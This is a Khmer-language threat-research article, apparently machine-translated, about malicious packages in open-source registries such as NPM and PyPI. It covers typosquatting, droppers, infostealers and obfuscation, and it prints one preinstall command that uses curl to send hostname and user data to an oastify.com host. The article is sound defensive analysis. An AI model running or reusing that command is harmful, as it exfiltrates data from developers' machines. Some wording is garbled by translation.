នៅក្នុងវគ្គមុននេះ ស. កញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ បញ្ហាយើងបានពិភាក្សាអំពីមូលហេតុដែលអ្នកគំរាមកំហែងមានចរិតបែបនេះ មានចំណង់ចំណូលចិត្តយ៉ាងខ្លាំងចំពោះការបោះពុម្ពផ្សាយសមាសធាតុព្យាបាទថ្មីៗ ឬការចាក់មេរោគទៅក្នុងកំណែចុងក្រោយបំផុតនៃសមាសធាតុដែលមានស្រាប់៖ ហេដ្ឋារចនាសម្ព័ន្ធប្រភពបើកចំហអនុញ្ញាតឱ្យនរណាម្នាក់នៅគ្រប់ទីកន្លែងបង្កើតគណនីបណ្ដោះអាសន្ន។ នៅក្នុងបញ្ជីឈ្មោះសមាសភាគ (ដូចជា NPM, PyPI, Docker Hub ឬ Visual Studio Marketplace) ឬវេទិកាអភិវឌ្ឍន៍សហការ (ដូចជា GitHub)។ មិនចាំបាច់ចំណាយច្រើន និងមានឱកាសជាច្រើនសម្រាប់ការទាញយកអត្ថប្រយោជន៍ពីការជឿទុកចិត្តលើសលប់ដែលក្រុមកម្មវិធីមានជាប្រពៃណីលើសមាសភាគភាគីទីបី។
ភាពមិនស៊ីមេទ្រីរវាងភាពងាយស្រួលសម្រាប់អ្នកវាយប្រហារក្នុងការចែកចាយមេរោគដោយប្រើហេដ្ឋារចនាសម្ព័ន្ធដែលមានសម្រាប់ប្រភពបើកចំហ និងការលំបាកសម្រាប់អង្គការដែលកំពុងអភិវឌ្ឍកម្មវិធី (មនុស្សគ្រប់គ្នា?) ក្នុងការជៀសវាងការឆ្លងមេរោគ (និងចែកចាយមេរោគនៅក្នុងកម្មវិធីដែលពួកគេចែកចាយសម្រាប់អ្នកដទៃ) បាននាំឱ្យមានចំនួនកញ្ចប់មេរោគជិតដល់មួយភាគបួនលានកាលពីឆ្នាំមុន។
នេះគឺជាបញ្ហាដ៏ធំមួយដែលគ្មានអង្គការណាមួយអាចដោះស្រាយវាបានឡើយ ហើយសហគមន៍កំពុងស្ថិតក្នុងដំណើរការកែសម្រួលដំណើរការប្រភពបើកចំហទាក់ទងនឹងការទុកចិត្ត គោលការណ៍សុវត្ថិភាពតាមលំនាំដើម និងគោលការណ៍សុវត្ថិភាពតាមការរចនា និងវដ្តជីវិតនៃសមាសធាតុ។ យើងនឹងពិនិត្យមើលគំនិតបែបនេះនៅក្នុងវគ្គបន្ទាប់។ ការការពារប្រឆាំងនឹងកញ្ចប់ព្យាបាទប្រភពបើកចំហ៖ អ្វីដែល (មិន) ដំណើរការ.
សូមចងចាំថាយើងកំពុងនិយាយអំពីសមាសធាតុកម្មវិធីដែលភាគច្រើនត្រូវគ្នានឹង កញ្ចប់សូហ្វវែរ: សមាសធាតុដែលអាចប្រើឡើងវិញបានត្រូវបានខ្ចប់ ដូច្នេះពួកវាអាចត្រូវបានយោងជាភាពអាស្រ័យនៅក្នុង manifest កម្មវិធី និងត្រូវបានដំឡើងជាមួយកម្មវិធីគ្រប់គ្រងកញ្ចប់ ឬឧបករណ៍បង្កើត។ សូមចំណាំថាករណីនេះអាចត្រូវបានពង្រីកដើម្បីរួមបញ្ចូលសាធារណៈ រូបភាពធុង (ប្រើដោយពេលដំណើរការកុងតឺន័រ និងវេទិការៀបចំដូចជា Kubernetes) និង ផ្នែកបន្ថែមទៅឧបករណ៍កម្មវិធី (សម្រាប់ការសាងសង់ ស្វ័យប្រវត្តិកម្ម និងការដាក់ពង្រាយ)។
នៅទីនេះយើងវិភាគពីរបៀបដែលរឿងនេះ យុទ្ធសាស្ត្រវាយប្រហារដោយផ្អែកលើសមាសធាតុព្យាបាទ ដំណើរការទៅតាមឧទាហរណ៍ពីមុន និងអ្វីដែលយើងបានឃើញនៅក្នុងវេទិការបស់យើងសម្រាប់ការព្រមានជាមុនអំពីមេរោគ (MEW)។ យើងនឹងវិភាគសមាសធាតុព្យាបាទក្នុងវិមាត្រផ្សេងៗគ្នា៖
(1) វិធីដែលបានជ្រើសរើសសម្រាប់ការចែកចាយ (បញ្ជីឈ្មោះដែលបានប្រើ នៅក្នុងសមាសភាគថ្មី ឬដែលមានស្រាប់ និងបច្ចេកទេសដែលប្រើសម្រាប់ឆ្លងកំណែសមាសភាគដែលបានបោះពុម្ពផ្សាយ), (2) របៀបដែលមេរោគត្រូវបានធ្វើឱ្យសកម្ម ឬបង្កឡើង (3) ឥរិយាបថព្យាបាទ ពោលគឺសកម្មភាពបង្កគ្រោះថ្នាក់អ្វីខ្លះដែលត្រូវបានគេសង្កេតឃើញ និងមួយណាជាការលើកទឹកចិត្តរបស់អ្នកវាយប្រហារ (4) បច្ចេកទេសណាខ្លះដែលជារឿងធម្មតាសម្រាប់ការបិទបាំង ការលាក់ខ្លួនដើម្បីមិនឱ្យគេកត់សម្គាល់ ចលនាចំហៀង ការទំនាក់ទំនងជាមួយម៉ាស៊ីនបញ្ជា និងត្រួតពិនិត្យ (C2) ។ល។ និង (5) បច្ចេកទេសសម្រាប់ទទួលបានប្រជាប្រិយភាព និងការជឿទុកចិត្តគ្រប់គ្រាន់ ដូច្នេះជនរងគ្រោះនឹងដំឡើងសមាសធាតុនោះ។
យន្តការចែកចាយដែលបានជ្រើសរើស
យើងសង្កេតឃើញ “សំលេងរំខានផ្ទៃខាងក្រោយនៃកញ្ចប់ព្យាបាទដែលមិនស្មុគស្មាញដោយប្រើ typosquatting ដើម្បីបន្លំអ្នកអភិវឌ្ឍន៍ដែលមិនប្រុងប្រយ័ត្នជាមួយនឹងកំហុសវាយអក្សរនៅក្នុងឈ្មោះកញ្ចប់សម្រាប់ការពឹងផ្អែករបស់ពួកគេ។ កញ្ចប់ពេញនិយមជាច្រើនទទួលបានកញ្ចប់ដែលមានឈ្មោះស្រដៀងគ្នាជាមួយនឹងកំហុសវាយអក្សរ ដោយមានការរំពឹងទុកថាពួកគេនឹងបន្លំអ្នកអភិវឌ្ឍន៍ដែលមិនប្រុងប្រយ័ត្នមួយចំនួន។
ពួកគេប្រើប្រាស់គណនីបណ្ដោះអាសន្នមួយ បោះពុម្ពផ្សាយក្រុមកញ្ចប់ typosquat បង្កើតមួយផ្សេងទៀត និងបោះពុម្ពផ្សាយក្រុមមួយផ្សេងទៀត... ដោយប្រើស្វ័យប្រវត្តិកម្ម និងភាពប៉ិនប្រសប់មួយចំនួន ពួកគេអាចទទួលបានភាពទំនើបខ្លះ ប៉ុន្តែជាធម្មតាពួកវាមានលក្ខណៈសាមញ្ញណាស់។ យើងហៅពួកគេជាផ្ទៃក្នុងថា "anchovies«ការលួចព័ត៌មានសម្គាល់ខ្លួនគឺជាគោលដៅចម្បង ប៉ុន្តែពេលខ្លះយើងឃើញមានកម្មវិធីចារកម្មលួចយកកូដប្រភព ឬទិន្នន័យរសើបដូចជាព័ត៌មានកំណត់អត្តសញ្ញាណផ្ទាល់ខ្លួន (PII) ការចាប់យកក្ដារតម្បៀតខ្ទាស់ និងការសង្ស័យផ្សេងៗទៀត។»
ចេញពីពណ៌ខៀវ យើងឃើញសមាសធាតុព្យាបាទដ៏ស្មុគស្មាញជាងនេះ គឺ "ត្រីឆ្លាម"។ ជនជាតិភាគតិចត្រូវបានកំណត់គោលដៅទៅកាន់ក្រុម ឬអង្គការជាក់លាក់ ជាធម្មតាជាមួយឧបករណ៍បង្ហូរគ្រីបតូ ឬឧបករណ៍ស្កែមគេហទំព័រ ដែលត្រូវបានធ្វើឱ្យសកម្មតាមលក្ខខណ្ឌ ប្រហែលជាធ្វើតាមវិធីសាស្រ្តដែលឃើញនៅក្នុង ហេតុការណ៍ស្ទ្រីមព្រឹត្តិការណ៍ នៃការឌិគ្រីបទិន្នន័យវាយប្រហារ លុះត្រាតែកញ្ចប់ត្រូវបានយោងពីកញ្ចប់គោលដៅ។
យន្តការចែកចាយត្រូវបានវិភាគនៅក្នុងឯកសារដ៏ល្អឥតខ្ចោះ និងឥឡូវនេះជាឯកសារបុរាណ “ការប្រមូលកាំបិតរបស់អ្នកចាក់ខាងក្រោយ៖ ការពិនិត្យឡើងវិញអំពីការវាយប្រហារខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីប្រភពបើកចំហ"ដែលជាសៀវភៅដែលត្រូវតែអាន។ ប្រាកដណាស់ អ្នកធ្លាប់បានឃើញតារាងដ៏ល្អនេះពីមុនមក៖

មធ្យោបាយទាំងអស់ត្រូវបានរុករក រួមទាំងកញ្ចប់ថ្មី និងកញ្ចប់ដែលមានស្រាប់ ដែលប៉ះពាល់ដល់កូដប្រភព ប្រព័ន្ធសាងសង់ ឬសមាសធាតុដែលបានវេចខ្ចប់ខ្លួនឯង ការប្រើប្រាស់ព័ត៌មានសម្ងាត់ដែលត្រូវបានគេលួច ឬវិស្វកម្មសង្គម ការលួចយកគណនី និងឃ្លាំងដែលបោះបង់ចោល ឬការបំពុលគណនី និងឃ្លាំងដែលបានថែទាំ។ ការវាយប្រហារមួយចំនួនបានទទួលឈ្មោះ (បន្លំ, ភាពច្របូកច្របល់នៃការពឹងផ្អែក, ភាពច្របូកច្របល់ជាក់ស្តែង, ការដកយកមកវិញ។ល។) ហើយត្រូវបានពិភាក្សារួចហើយនៅកន្លែងផ្សេង។
ចុះចំណែកបញ្ជីដែលបានជ្រើសរើសវិញ?
NPM នៅតែបន្តនាំមុខគេក្នុងចំនួនសរុបនៃកញ្ចប់មេរោគព្យាបាទ ប៉ុន្តែយើងបានឃើញការកើនឡើងយ៉ាងខ្លាំងចាប់តាំងពីឆ្នាំនេះនៅលើ PyPI។ Python គឺជាប្រព័ន្ធអេកូឡូស៊ីដ៏ពេញនិយមសម្រាប់វិទ្យាសាស្ត្រទិន្នន័យ និងការរៀនម៉ាស៊ីន។ តាមពិតទៅ ដង់ស៊ីតេមេរោគឥឡូវនេះខ្ពស់ជាងនៅក្នុង PyPI ជាងនៅក្នុង NPM។
របៀបដែលមេរោគត្រូវបានបង្កឡើង
កញ្ចប់ព្យាបាទត្រូវបានបង្កឡើងក្នុងអំឡុងពេលដំឡើងមានតែ 4 ក្នុងចំណោម 10 ករណីប៉ុណ្ណោះ (ក្នុងរយៈពេលប៉ុន្មានឆ្នាំចុងក្រោយនេះ វាជិតដល់ 6 ក្នុងចំណោម 10 ករណី)។ កញ្ចប់ដែលនៅសល់ដំណើរការឥរិយាបថព្យាបាទនៅពេលដំណើរការ ដោយមាន 1 ក្នុងចំណោម 100 ត្រូវបានបង្កឡើងនៅពេលដំណើរការការធ្វើតេស្ត។ សត្រូវហាក់ដូចជាដឹងថាការប្រតិបត្តិស្គ្រីបដំឡើងដែលមិនអាចគ្រប់គ្រងបានត្រូវបានបិទនៅកន្លែងជាច្រើន។
តើមនុស្សអាក្រក់កំពុងទទួលបានអ្វី?
យើងនឹងរាយបញ្ជីប្រភេទអាកប្បកិរិយាព្យាបាទ ដោយចាប់ផ្តើមពីប្រភេទដែលពេញនិយមបំផុតជាមុនសិន។ សូមចំណាំថាផលប៉ះពាល់អាចខុសគ្នាខ្លាំង៖ ក ឧបករណ៍ជូតទឹក គឺជាការបំផ្លិចបំផ្លាញដ៏រឹងរូស ប៉ុន្តែវាមិនមែនជារឿងធម្មតាទេ ហើយត្រូវបានគេឃើញតែក្នុងករណីមួយចំនួនតូចប៉ុណ្ណោះ ដែលទាក់ទងនឹងយុទ្ធនាការសង្គ្រាមតាមអ៊ីនធឺណិតដែលមានគោលដៅ ឬការលួចចូលប្រព័ន្ធកុំព្យូទ័រយ៉ាងឃោរឃៅ។ ប្រភេទខាងក្រោមនេះគឺជារឿងធម្មតាណាស់៖
- InfoStealer / Credentials Drainerរហូតមកដល់ពេលនេះ ការវាយប្រហារដែលមិនស្មុគស្មាញជាង 90% គឺជាអ្នកលួចដ៏សាមញ្ញ ដែលភាគច្រើនស្វែងរកព័ត៌មានសម្ងាត់ដូចជា ពាក្យសម្ងាត់ ថូខឹនចូលប្រើ កូនសោ API និងកូនសោឯកជន (សម្រាប់ SSH និងអ្វីៗផ្សេងទៀត)។ វាប្រហែលជាវិធីងាយស្រួលបំផុតក្នុងការសរសេរ (រួមជាមួយឧបករណ៍លុបទិន្នន័យ?)។ ពួកគេរាយបញ្ជីឯកសារ/ថតឯកសារដែលគេស្គាល់ និងប្រភពផ្សេងទៀត (ឧទាហរណ៍ កូនសោចុះបញ្ជី) វេចខ្ចប់ខ្លឹមសារ និងផ្ញើទិន្នន័យនោះទៅម៉ាស៊ីនមេ C2។ គំនិតគឺសាមញ្ញ៖ "ខ្ញុំបោះពុម្ពផ្សាយកម្មវិធីលួចសម្រាប់ព័ត៌មានសម្ងាត់បន្លំ ដូច្នេះខ្ញុំអាចប្រើព័ត៌មានសម្ងាត់សម្រាប់ការវាយប្រហារដោយផ្ទាល់នៅពេលក្រោយ"។
បណ្តាញ C2 ដែលត្រូវបានគេសង្កេតឃើញជាធម្មតាមានតម្លៃថោក និងកខ្វក់ ដូចជាបណ្តាញ Telegram ឬ ឧបករណ៍ជីករូងក្រោមដីដែលស្រដៀងនឹងង៉ុក (ជារឿយៗក្នុងទម្រង់ជាប្រូកស៊ីបញ្ច្រាសដែលបង្ហាញតាមរយៈ IP ច្រកចេញ VPN)។ មានលទ្ធភាពរាប់រយ (!) ជាមួយនឹងគម្រោង GitHub ជាច្រើននៅក្រោម ប្រធានបទលួចពាក្យសម្ងាត់ជំនាញដូចជា keyloggers គឺកម្រមានសម្រាប់កញ្ចប់ព្យាបាទ និងរូបភាពកុងតឺន័រ ប៉ុន្តែវាកើតឡើងញឹកញាប់ជាងនៅក្នុងផ្នែកបន្ថែមឧបករណ៍ ដែលអន្តរកម្មរបស់អ្នកប្រើប្រាស់ត្រូវបានរំពឹងទុក។
- ឧបករណ៍ទម្លាក់ / ឧបករណ៍ទាញយកមានប្រជាប្រិយភាពលំដាប់ទីពីរ ជាធម្មតាស្ថិតនៅលំដាប់ទីមួយក្នុងការវាយប្រហារច្រើនដំណាក់កាល។ សមាសធាតុព្យាបាទច្រើនជាងមួយក្នុងចំណោមបីមាន droppers (ប្រសិនបើ payload ព្យាបាទរួមបញ្ចូលនៅក្នុងកញ្ចប់) ឬ downloader (payload ត្រូវបានទាញយកពីចំណុចបញ្ចប់ក្រោមការគ្រប់គ្រងរបស់អ្នកវាយប្រហារ)។ payload ជារឿយៗជាបំរែបំរួលមេរោគគោលពីរដែលគេស្គាល់ ហើយវាត្រូវបានដំណើរការ និងជួនកាលនៅតែបន្ត សម្រាប់ការដំឡើង backdoor, spyware, crypto drainers និងករណីប្រើប្រាស់ផ្សេងទៀត។ payload ដែលបានទាញយក ឬដាក់ពង្រាយចាប់ផ្តើមការវាយប្រហារដំណាក់កាលទីពីរជាមួយនឹងថាមពលទាំងអស់ដែលផ្តល់ដោយប្រព័ន្ធគោលពីរមេរោគដែលមានស្រាប់។ ប្រព័ន្ធគោលពីរអាចត្រូវបានចែកចាយនៅក្នុងកញ្ចប់ ដែលជារឿយៗត្រូវបានក្លែងបន្លំជារូបភាព ឬប្រភេទឯកសារដែលមិនបង្កគ្រោះថ្នាក់ ដើម្បីជៀសវាងការរកឃើញ ខណៈពេលភ្ជាប់ទៅគេហទំព័រដែលមិននឹកស្មានដល់។
- អ្នកលួច/អ្នកជីកយករូបិយប័ណ្ណឌីជីថលគូប្រជែងដែលមានការលើកទឹកចិត្តផ្នែកហិរញ្ញវត្ថុមានឆន្ទៈក្នុងការប្រើប្រាស់ទ្រព្យសកម្មពពករបស់អ្នកសម្រាប់ដំណើរការ cryptominers (ពួកគេថែមទាំងរកឃើញថាតើពួកគេកំពុងដំណើរការនៅក្នុង cloud VM ដែរឬទេ)។ ពួកគេមិនខ្វល់ពី អត្រាប្រាក់ចំណេញទាប ១ ដុល្លារសម្រាប់រាល់ ៥៣ ដុល្លារដែលត្រូវបានគិតប្រាក់ទៅជនរងគ្រោះសម្រាប់ហេដ្ឋារចនាសម្ព័ន្ធ cloud ដែលត្រូវបានគេលួច។ ជនរងគ្រោះប្រហែលជាមិនដឹងអំពីរឿងនេះទេរហូតដល់ពួកគេទទួលបានវិក្កយបត្រដែលមិននឹកស្មានដល់។ ជាសំណាងល្អ រឿងនេះកើតឡើងហើយក៏បាត់ទៅវិញ។ ក្លែងក្លាយ យុទ្ធនាការនៅក្នុងកញ្ចប់ព្យាបាទជួនកាលលេចឡើង ហើយបន្ទាប់មករសាត់បាត់ទៅ ការបន្លំសម្រាប់អ្នកប្រើប្រាស់កាបូបលុយ ឬនៅទីបំផុតកំណត់គោលដៅអ្នកផ្តល់សេវាកាបូបលុយ ដូចជានៅក្នុង ការវាយប្រហារលើសៀវភៅបញ្ជី.
ឥរិយាបថផ្សេងទៀត ដូចជាការដាក់ពង្រាយ Backdoor សម្រាប់ការប្រតិបត្តិកូដពីចម្ងាយដោយការបើក reverse shell គឺមិនសូវកើតមានញឹកញាប់ជាងពេលមុនៗទេ។ ឧទាហរណ៍ គេហទំព័រអ្នករួមចំណែក 123rf កញ្ចប់ (ឥឡូវនេះត្រូវបានដកចេញពីបញ្ជីឈ្មោះ) បើកដោយគ្មានការបិទបាំងណាមួយឡើយ សែលបញ្ច្រាស់ត្រូវបានចម្លង និងបិទភ្ជាប់ពី សន្លឹកបន្លំ Reverse Shell:

បន្ថែមពីលើសមាសធាតុស្របច្បាប់ និងសមាសធាតុព្យាបាទ យើងបានសង្កេតឃើញការរំលោភបំពានជាច្រើន រួមមាន៖
កញ្ចប់សារឥតបានការ
មានកញ្ចប់តូចៗរាប់ពាន់ ភាគច្រើននៅក្នុង NPM ដោយគ្មានមេរោគ ប៉ុន្តែសន្យាថានឹងរកប្រាក់ចំណូលបានយ៉ាងងាយស្រួល ប្រេងពស់ តំណភ្ជាប់ទៅកាន់ការផ្តល់ជូន Viagra និងអ្វីៗផ្សេងទៀត។ អ្នកប្រើប្រាស់មួយចំនួនបានបោះពុម្ពផ្សាយសារឥតបានការបែបនេះ ហើយយក bandwidth ច្រើនពីបញ្ជីឈ្មោះ។ តារាសម្តែងម្នាក់ទៀតដែលអាចមកពីប្រទេសឥណ្ឌូនេស៊ីបានព្យាយាមទាញយកអត្ថប្រយោជន៍ដោយ ការរំលោភបំពានលើចំណាត់ថ្នាក់តែ មានបំណងសម្រាប់ផ្តល់សំណងដល់អ្នកអភិវឌ្ឍន៍ប្រភពបើកចំហ ដោយបង្កើតកញ្ចប់ NPM រាប់ម៉ឺនដែលទាក់ទងគ្នាជាមួយឃ្លាំង GitHub dummy ដែលពាក់ព័ន្ធ។ នេះគឺជាការរំលោភបំពានយ៉ាងច្បាស់លាស់លើលក្ខខណ្ឌនៃការប្រើប្រាស់។
ការបោកប្រាស់អំពីរង្វាន់កំហុស និងការស្រាវជ្រាវសុវត្ថិភាព
នៅពេលដែលកញ្ចប់មួយពណ៌នាខ្លួនឯងថាជាការលួចយកទិន្នន័យសម្រាប់គោលបំណងល្អ ដូចជាការរកឃើញចំណុចខ្វះខាតសុវត្ថិភាពសម្រាប់កម្មវិធីផ្តល់រង្វាន់កំហុស ឬការស្រាវជ្រាវទិដ្ឋភាពជាក់លាក់នៃប្រព័ន្ធអេកូឡូស៊ី។ យើងបានឃើញកញ្ចប់រាប់ពាន់នៅក្នុងប្រភេទនេះ ដែលទាញយកការកំណត់អត្តសញ្ញាណ ប៉ុន្តែមិនមែនជាទិន្នន័យរសើបពេកទៅកាន់អាសយដ្ឋាន Burp Collaborator ពី PortSwigger (ឧទាហរណ៍ ម៉ាស៊ីននៅក្នុងដែន oastify.com)។ យើងបានសង្កេតឃើញជាញឹកញាប់នូវច្បាប់ចម្លងនៃ ភាពច្របូកច្របល់នៃការពឹងផ្អែក ភស្តុតាងនៃគំនិតដោយ Alex Birsan ដូចជា aurora-webmail-pro កញ្ចប់ (ត្រូវបានដកចេញពីបញ្ជីឈ្មោះ) ដែលគ្រាន់តែដំណើរការកូដអាក្រក់នេះនៅក្នុងស្គ្រីបមុនដំឡើង៖
exec("a=$(hostname; pwd; whoami; echo 'aurora-webmail-pro'; curl http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/;) && echo $a | xxd -p | head | while read ut; do curl -k -i -s http://kmauspo6z5noqllvwu0oj6lqahg84ysn.oastify.com/$ut;done") ហើយក៏រួមបញ្ចូលទាំងពាក្យ «នេះគឺជាភស្តុតាងនៃគំនិតនៃការវាយប្រហារភាពច្របូកច្របល់ Dependency សាមញ្ញការពិពណ៌នាអំពីសេចក្តីប្រកាសមិនទទួលខុសត្រូវនៅក្នុង កញ្ចប់នេះជាការរំលោភបំពានយ៉ាងច្បាស់លើលក្ខខណ្ឌនៃសេវាកម្ម សូម្បីតែគ្មានចេតនាអាក្រក់ក៏ដោយ។
មានដំណឹងល្អខ្លះទេ? យើងមិនទាន់បានឃើញការវាយប្រហារ ransomware តាមរយៈសមាសធាតុព្យាបាទនៅឡើយទេ។ ដោយមិនដឹងមូលហេតុ ឧក្រិដ្ឋជនតាមអ៊ីនធឺណិតហាក់ដូចជាចូលចិត្តយន្តការចែកចាយការបន្លំអ៊ីមែលបែបប្រពៃណី ផ្អែកលើ RDP និង drive-by download។
បច្ចេកទេសបន្ថែមដែលបានសង្កេតឃើញ

បច្ចេកទេសជាច្រើនត្រូវបានប្រើសម្រាប់ការស៊ូទ្រាំ ការគេចវេសពីការការពារខ្លួន ការប្រមូលព័ត៌មាន ការទំនាក់ទំនងជាមួយម៉ាស៊ីនបញ្ជា និងត្រួតពិនិត្យ និងការលួចចូល។
ការតស៊ូ នៅក្នុងសមាសធាតុព្យាបាទ ត្រូវបានទទួលបានដោយប្រើលក្ខណៈពិសេសនៃការបន្តនៅក្នុងមេរោគគោលពីរដំណាក់កាលទីពីរ ប៉ុន្តែពេលខ្លះឥរិយាបថនេះមានទីតាំងនៅក្នុងកូដកញ្ចប់ ដោយភារកិច្ចដែលបានកំណត់ពេល និងការផ្លាស់ប្តូរនៅក្នុងបញ្ជីឈ្មោះវីនដូគឺជារឿងធម្មតាបំផុត។
Obfuscation គឺជារឿងធម្មតា ប៉ុន្តែមិនស្មុគស្មាញទេ។ កញ្ចប់វាយអក្សរភាគច្រើន (សូមចងចាំ "anchovies") កុំប្រើការបិទបាំងទាល់តែសោះ។ មនុស្សជាច្រើនប្រើទាំងការអ៊ិនកូដ base64/hex ឬស៊ីហ្វឺរជំនួសដូចជា rot13) ឬប្រើឧបករណ៍បិទបាំងកូដ និងការបង្រួមទំហំកូដដែលមាន ដែលងាយស្រួលបញ្ច្រាស់ដោយប្រើឧបករណ៍ត្រឹមត្រូវ។ មានតែ "ត្រីឆ្លាម" ទេដែលធ្វើការបិទបាំងពិតប្រាកដ រឹងរូស ពិបាកវិស្វកម្មបញ្ច្រាស់។
ការបិទបាំងអាចលាក់បាំងការវាយប្រហារ ប៉ុន្តែហេតុអ្វីបានជាកូដនៅក្នុងសមាសធាតុប្រភពបើកចំហត្រូវបិទបាំង? តើមានភស្តុតាងដែលបង្ហាញថាមានអ្វីមួយត្រូវលាក់បាំងពីការមើលឃើញធម្មតាទេ? យើងបានរកឃើញឧទាហរណ៍ជាច្រើននៃកញ្ចប់ដែលមិនមានមេរោគដែលប្រើការបិទបាំងដើម្បីការពារកម្មសិទ្ធិបញ្ញា ដែលផ្ទុយពី "ប្រភពបើកចំហ"។ ការបិទបាំងអាចត្រូវបានប្រើជាភស្តុតាងនៃមេរោគ ប៉ុន្តែវាមិនមែនជាការសន្និដ្ឋានច្បាស់លាស់ទេ។ វាក៏ពិបាកក្នុងការបំបាត់ការបិទបាំងផងដែរ។
ការគេចវេស ពីការគ្រប់គ្រងការការពារជាតិ ប្រើប្រាស់បច្ចេកទេសសាមញ្ញៗ។ កូដព្យាបាទច្រើនតែត្រូវបានការពារនៅក្នុង ព្យាយាម...ចាប់ ប្លុកដែលមិនអើពើនឹងករណីលើកលែងណាមួយ ដូច្នេះសកម្មភាពមិនប្រក្រតីមិនត្រូវបានបង្ហាញនៅក្នុងកំណត់ហេតុទេ។ ការផ្ទៀងផ្ទាត់បរិស្ថាន (ដែលកំពុងដំណើរការនៅក្នុង VM ឬកុងតឺន័រ) គឺកម្រមានណាស់ លុះត្រាតែមានមេរោគដែលកំណត់គោលដៅលើអង្គការ ឬបរិស្ថានជាក់លាក់ណាមួយ។
ការក្លែងបន្លំប្រព័ន្ធគោលពីរនៅក្នុងរូបភាព និងឯកសារ PDF (ប្រភេទ steganography) គឺជាបច្ចេកទេសមួយផ្សេងទៀតដែលត្រូវបានគេមើលឃើញថាអាចគេចផុតពីការរកឃើញ។
ដោយសារសមាសធាតុព្យាបាទទូទៅបំផុតគឺ infostealers ការប្រមូលទិន្នន័យ គឺមានសារៈសំខាន់ណាស់។ អាថ៌កំបាំង (ពាក្យសម្ងាត់ ថូខឹនចូលប្រើ កូនសោ API កូនសោគ្រីបតូក្រាហ្វិច) ត្រូវបានស្កេនជាប្រចាំនៅក្នុងឯកសារកំណត់ហេតុ អថេរបរិស្ថាន និងសូម្បីតែក្ដារតម្បៀតខ្ទាស់ (ឃើញជាមួយមេរោគ Trojans ធនាគារ និងអ្នកលួចគ្រីបតូ)។ ការលួចយកកូដប្រភពក៏ជារឿងធម្មតាដែរ ព្រោះការដំឡើងកញ្ចប់ត្រូវបានធ្វើឡើងជាញឹកញាប់នៅក្នុងថ្នាំងអភិវឌ្ឍន៍ដែលឃ្លាំង git ខាងក្នុងអាចត្រូវបានក្លូន។ យើងបានឃើញកញ្ចប់រាយបញ្ជីថតដើម្បីស្វែងរកឃ្លាំង git។ ការស្វែងរកទីតាំងដូចជា .env, private.pem, settings.py, app.js ឬ application.properties គឺជារឿងធម្មតាណាស់។
ការលួចយកទិន្នន័យចេញ (Exfiltration) គឺជាសកម្មភាពមួយផ្សេងទៀតដែលត្រូវបានដាក់ពង្រាយយ៉ាងទូលំទូលាយ។ មានតែកញ្ចប់មេរោគមួយចំនួនតូចប៉ុណ្ណោះដែលព្យាយាមលាក់គោលដៅនៃទិន្នន័យដែលបានស្រង់ចេញ។ ឆានែល Telegram និង ផ្លូវរូងក្រោមដីដែលមានរាងដូចង៉ុក ត្រូវបានគេប្រើជាញឹកញាប់។ ហើយមានច្រើន ជាធម្មតា ដែនដែលបានដាក់ក្នុងបញ្ជីស ដែលត្រូវបានប្រើសម្រាប់ការច្រោះចេញ.
បច្ចេកទេសផ្សេងទៀត ដូចជាការកើនឡើងសិទ្ធិ ឬចលនាចំហៀង គឺមិនសូវកើតមានទេ។
ទទួលបានប្រជាប្រិយភាព និងទំនុកចិត្ត
ស្រមៃមើលចោរបច្ចេកវិទ្យាម្នាក់ដែលមានរបស់ព្យាបាទឃាតករដែលត្រៀមរួចជាស្រេច ហើយឆ្ងល់ថា "តើខ្ញុំធ្វើដូចម្តេចដើម្បីឲ្យរបស់ដ៏ថោកទាបនេះគួរឱ្យទុកចិត្តចំពោះមនុស្សល្ងង់ខ្លៅទាំងនោះ?"
នោះបកប្រែទៅជារបៀបបង្កើតធាតុសម្រាប់សមាសធាតុព្យាបាទដើម្បីបង្ហាញផ្កាយ / សមជាច្រើន (សម្រាប់ប្រជាប្រិយភាព) បូករួមទាំងកំណែ / បញ្ហា និង pull requests (សម្រាប់សកម្មភាព)។ គំនិតនេះគឺដើម្បីទទួលបានប្រជាប្រិយភាពប្រឌិត (ផ្កាយ) និងអ្នកនៅក្នុងបន្ទុក និងរូបរាងដ៏គួរឱ្យជឿជាក់ទាក់ទងនឹងភាពពាក់ព័ន្ធ និងការថែទាំ។
បញ្ជីឈ្មោះមិនពិនិត្យមើលថាតើខ្លឹមសារនៅក្នុងគម្រោង GitHub និងខ្លឹមសារកញ្ចប់ត្រូវគ្នាឬអត់ទេ។នេះគឺជាបញ្ហាដែលគេស្គាល់យ៉ាងច្បាស់នៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។ ការចុះបញ្ជីសាធារណៈគឺជារណ្តៅដ៏ធំដែលលេបត្របាក់អ្វីៗគ្រប់យ៉ាងដែលពួកគេបានបោះចោល។ អ្នកអាចភ្ជាប់ឃ្លាំងទិន្នន័យណាមួយ។

ប្រសិនបើកញ្ចប់ព្យាបាទវាយអក្សរខុសលើកញ្ចប់ដ៏ពេញនិយមមួយ នោះងាយស្រួលណាស់៖ គ្រាន់តែយោងទៅលើឃ្លាំង GitHub ដែលមានស្រាប់នៅក្នុងបញ្ជីឈ្មោះអាស្រ័យដែលប្រើសម្រាប់បង្កើតកញ្ចប់ និងបោះពុម្ពផ្សាយវាទៅក្នុងបញ្ជីឈ្មោះ។ សម្រាប់កញ្ចប់ថ្មីនៅលើឃ្លាំង GitHub ក្លែងក្លាយ អ្នកប្រហែលជាត្រូវការភាពប៉ិនប្រសប់បន្ថែមទៀត ប្រហែលជាការបង្កើតឃ្លាំងក្លែងក្លាយ ការមើលផ្កាយ/ការដើរកាត់ គណនី GitHub តាមរយៈការសរសេរស្គ្រីប។
